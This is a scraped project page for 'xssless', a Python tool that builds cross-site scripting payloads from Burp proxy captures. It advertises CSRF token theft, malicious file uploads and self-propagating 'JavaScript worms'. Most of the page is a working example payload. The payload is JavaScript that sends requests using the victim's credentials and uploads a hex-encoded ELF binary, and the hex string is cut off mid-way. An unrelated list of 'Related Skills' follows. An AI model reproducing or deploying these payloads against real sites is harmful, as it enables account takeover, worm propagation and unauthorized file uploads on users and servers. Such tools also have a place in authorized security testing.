Xssless
An automated XSS payload generator written in python.
Install / Use
/learn @mandatoryprogrammer/XsslessREADME
xssless
An automated XSS payload generator written in python.
Usage
- Record request(s) with Burp proxy
- Select request(s) you want to generate, then right click and select "Save items"
- Use xssless to generate your payload:
./xssless.py burp_export_file - Pwn!
A more detailed tutorial can be found here
Features
- Automated XSS payload generation from imported Burp proxy requests
- Payloads are 100% asynchronous and won't freeze the user's browser
- Payloads are optimized, but should be minimized by a third party tool
- CSRF tokens can be easily extracted and set via the -p option
- POST multipart is supported, along with XSS file uploading via the -f option
- Payloads are dynamic and portable (due to relative URLs)
- Self propagation is now supported - meaning you can set a POST value to the payload itself!
- Crazy JavaScript worms with no hassle!
Upcoming
- Suggestions?
Installation
Download the latest xssless:
git clone https://github.com/mandatoryprogrammer/xssless
Run the script:
./xssless.py -h
Example Payload
This is an example XSS payload output (uncompressed) that parses CSRF tokens and uploads a binary all via XSS!
Example command line usage:
./xssless.py -s -f=example_file_list.txt -p=example_csrf_token_list.txt file_upload
<script type="text/javascript">
m();
function m() {
var funcNum = 0;
doRequest = function(url, method, body)
{
var http = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
http.withCredentials = true;
http.onreadystatechange = function() {
if (this.readyState == 4) {
var response = http.responseText;
var d = document.implementation.createHTMLDocument("");
d.documentElement.innerHTML = response;
requestDoc = d;
funcNum++;
try {
window['r' + funcNum](requestDoc);
} catch (error) {}
}
};
if (method == "MPOST") {
http.open('POST', url, true);
var bound = Math.random().toString(36).slice(2);
body = body.split("BOUNDMARKER").join(bound);
http.setRequestHeader('Content-type', 'multipart/form-data, boundary=' + bound);
http.setRequestHeader('Content-length', body.length);
http.setRequestHeader('Connection', 'close');
http.sendAsBinary(body);
}
if (method == "GET") {
http.open('GET', url, true);
http.send();
}
}
r0();
}
function r0(requestDoc){
doRequest('/uploader/', 'GET', '');
}
function r1(requestDoc){
doRequest('/uploader/index.php', 'MPOST', '--BOUNDMARKER\r\nContent-Disposition: form-data; name="file"; filename="adder"\r\nContent-Type: application/octet-stream\r\n\r\n\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x3e\x00\x01\x00\x00\x00\x00\x04\x40\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x70\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x38\x00\x09\x00\x40\x00\x1e\x00\x1b\x00\x06\x00\x00\x00\x05\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x40\x00\x40\x00\x00\x00\x00\x00\x40\x00\x40\x00\x00\x00\x00\x00\xf8\x01\x00\x00\x00\x00\x00\x00\xf8\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x38\x02\x00\x00\x00\x00\x00\x00\x38\x02\x40\x00\x00\x00\x00\x00\x38\x02\x40\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\xbc\x06\x00\x00\x00\x00\x00\x00\xbc\x06\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x10\x0e\x00\x00\x00\x00\x00\x00\x10\x0e\x60\x00\x00\x00\x00\x00\x10\x0e\x60\x00\x00\x00\x00\x00\x28\x02\x00\x00\x00\x00\x00\x00\x30\x02\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x28\x0e\x00\x00\x00\x00\x00\x00\x28\x0e\x60\x00\x00\x00\x00\x00\x28\x0e\x60\x00\x00\x00\x00\x00\xd0\x01\x00\x00\x00\x00\x00\x00\xd0\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x54\x02\x00\x00\x00\x00\x00\x00\x54\x02\x40\x00\x00\x00\x00\x00\x54\x02\x40\x00\x00\x00\x00\x00\x44\x00\x00\x00\x00\x00\x00\x00\x44\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x50\xe5\x74\x64\x04\x00\x00\x00\xb4\x05\x00\x00\x00\x00\x00\x00\xb4\x05\x40\x00\x00\x00\x00\x00\xb4\x05\x40\x00\x00\x00\x00\x00\x34\x00\x00\x00\x00\x00\x00\x00\x34\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x51\xe5\x74\x64\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x52\xe5\x74\x64\x04\x00\x00\x00\x10\x0e\x00\x00\x00\x00\x00\x00\x10\x0e\x60\x00\x00\x00\x00\x00\x10\x0e\x60\x00\x00\x00\x00\x00\xf0\x01\x00\x00\x00\x00\x00\x00\xf0\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x2f\x6c\x69\x62\x36\x34\x2f\x6c\x64\x2d\x6c\x69\x6e\x75\x78\x2d\x78\x38\x36\x2d\x36\x34\x2e\x73\x6f\x2e\x32\x00\x04\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x47\x4e\x55\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x18\x00\x00\x00\x04\x00\x00\x00\x14\x00\x00\x00\x03\x00\x00\x00\x47\x4e\x55\x00\xb2\x49\x58\x00\x86\x85\x15\xba\xf4\xc6\x40\xae\x02\xca\x5b\x5b\xdc\xb5\x66\x80\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1d\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6c\x69\x62\x63\x2e\x73\x6f\x2e\x36\x00\x5f\x5f\x6c\x69\x62\x63\x5f\x73\x74\x61\x72\x74\x5f\x6d\x61\x69\x6e\x00\x5f\x5f\x67\x6d\x6f\x6e\x5f\x73\x74\x61\x72\x74\x5f\x5f\x00\x47\x4c\x49\x42\x43\x5f\x32\x2e\x32\x2e\x35\x00\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x01\x00\x01\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x75\x1a\x69\x09\x00\x00\x02\x00\x2c\x00\x00\x00\x00\x00\x00\x00\xf8\x0f\x60\x00\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x10\x60\x00\x00\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x10\x60\x00\x00\x00\x00\x00\x07\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48\x83\xec\x08\x48\x8b\x05\x45\x0c\x20\x00\x48\x85\xc0\x74\x05\xe8\x33\x00\x00\x00\x48\x83\xc4\x08\xc3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x35\x32\x0c\x20\x00\xff\x25\x34\x0c\x20\x00\x0f\x1f\x40\x00\xff\x25\x32\x0c\x20\x00\x68\x00\x00\x00\x00\xe9\xe0\xff\xff\xff\xff\x25\x2a\x0c\x20\x00\x68\x01\x00\x00\x00\xe9\xd0\xff\xff\xff\x31\xed\x49\x89\xd1\x5e\x48\x89\xe2\x48\x83\xe4\xf0\x50\x54\x49\xc7\xc0\xa0\x05\x40\x00\x48\xc7\xc1\x10\x05\x40\x00\x48\xc7\xc7\xec\x04\x40\x00\xe8\xb7\xff\xff\xff\xf4\x66\x90\x0f\x1f\x40\x00\xb8\x3f\x10\x60\x00\x55\x48\x2d\x38\x10\x60\x00\x48\x83\xf8\x0e\x48\x89\xe5\x77\x02\x5d\xc3\xb8\x00\x00\x00\x00\x48\x85\xc0\x74\xf4\x5d\xbf\x38\x10\x60\x00\xff\xe0\x0f\x1f\x80\x00\x00\x00\x00\xb8\x38\x10\x60\x00\x55\x48\x2d\x38\x10\x60\x00\x48\xc1\xf8\x03\x48\x89\xe5\x48\x89\xc2\x48\xc1\xea\x3f\x48\x01\xd0\x48\x89\xc6\x48\xd1\xfe\x75\x02\x5d\xc3\xba\x00\x00\x00\x00\x48\x85\xd2\x74\xf4\x5d\xbf\x38\x10\x60\x00\xff\xe2\x0f\x1f\x80\x00\x00\x00\x00\x80\x3d\x91\x0b\x20\x00\x00\x75\x11\x55\x48\x89\xe5\xe8\x7e\xff\xff\xff\x5d\xc6\x05\x7e\x0b\x20\x00\x01\xf3\xc3\x0f\x1f\x40\x00\x48\x83\x3d\x58\x09\x20\x00\x00\x74\x1b\xb8\x00\x00\x00\x00\x48\x85\xc0\x74\x11\x55\xbf\x20\x0e\x60\x00\x48\x89\xe5\xff\xd0\x5d\xe9\x7b\xff\xff\xff\xe9\x76\xff\xff\xff\x66\x90\x55\x48\x89\xe5\xc7\x45\xf4\x02\x00\x00\x00\xc7\x45\xf8\x02\x00\x00\x00\x8b\x45\xf8\x8b\x55\xf4\x01\xd0\x89\x45\xfc\x5d\xc3\x0f\x1f\x44\x00\x00\x48\x89\x6c\x24\xd8\x4c\x89\x64\x24\xe0\x48\x8d\x2d\xf7\x08\x20\x00\x4c\x8d\x25\xe8\x08\x20\x00\x48\x89\x5c\x24\xd0\x4c\x89\x6c\x24\xe8\x4c\x89\x74\x24\xf0\x4c\x89\x7c\x24\xf8\x48\x83\xec\x38\x4c\x29\xe5\x41\x89\xff\x49\x89\xf6\x48\xc1\xfd\x03\x49\x89\xd5\x31\xdb\xe8\x51\xfe\xff\xff\x48\x85\xed\x74\x1a\x0f\x1f\x40\x00\x4c\x89\xea\x4c\x89\xf6\x44\x89\xff\x41\xff\x14\xdc\x48\x83\xc3\x01\x48\x39\xeb\x75\xea\x48\x8b\x5c\x24\x08\x48\x8b\x6c\x24\x10\x4c\x8b\x64\x24\x18\x4c\x8b\x6c\x24\x20\x4c\x8b\x74\x24\x28\x4c\x8b\x7c\x24\x30\x48\x83\xc4\x38\xc3\x0f\x1f\x80\x00\x00\x00\x00\xf3\xc3\x66\x90\x48\x83\xec\x08\x48\x83\xc4\x08\xc3\x00\x00\x00\x01\x00\x02\x00\x01\x1b\x03\x3b\x30\x00\x00\x00\x05\x00\x00\x00\x1c\xfe\xff\xff\x7c\x00\x00\x00\x4c\xfe\xff\xff\x4c\x00\x00\x00\x38\xff\xff\xff\xa4\x00\x00\x00\x5c\xff\xff\xff\xc4\x00\x00\x00\xec\xff\xff\xff\xec\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x01\x7a\x52\x00\x01\x78\x10\x01\x1b\x0c\x07\x08\x90\x01\x07\x10\x14\x00\x00\x00\x1c\x00\x00\x00\xf8\xfd\xff\xff\x2a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x01\x7a\x52\x00\x01\x78\x10\x01\x1b\x0c\x07\x08\x90\x01\x00\x00\x24\x00\x00\x00\x1c\x00\x00\x00\x98\xfd\xff\xff\x30\x00\x00\x00\x00\x0e\x10\x46\x0e\x18\x4a\x0f\x0b\x77\x08\x80\x00\x3f\x1a\x3b\x2a\x33\x24\x22\x00\x00\x00\x00\x1c\x00\x00\x00\x44\x00\x00\x00\x8c\xfe\xff\xff\x1f\x00\x00\x00\x00\x41\x0e\x10\x86\x02\x43\x0d\x06\x5a\x0c\x07\x08\x00\x00\x00\x24\x00\x00\x00\x64\x00\x00\x00\x90\xfe\xff\xff\x89\x00\x00\x00\x00\x4a\x86\x06\x8c\x05\x66\x0e\x40\x83\x07\x8d\x04\x8e\x03\x8f\x02\x02\x58\x0
Related Skills
node-connect
349.2kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
109.5kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
349.2kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
qqbot-media
349.2kQQBot 富媒体收发能力。使用 <qqmedia> 标签,系统根据文件扩展名自动识别类型(图片/语音/视频/文件)。
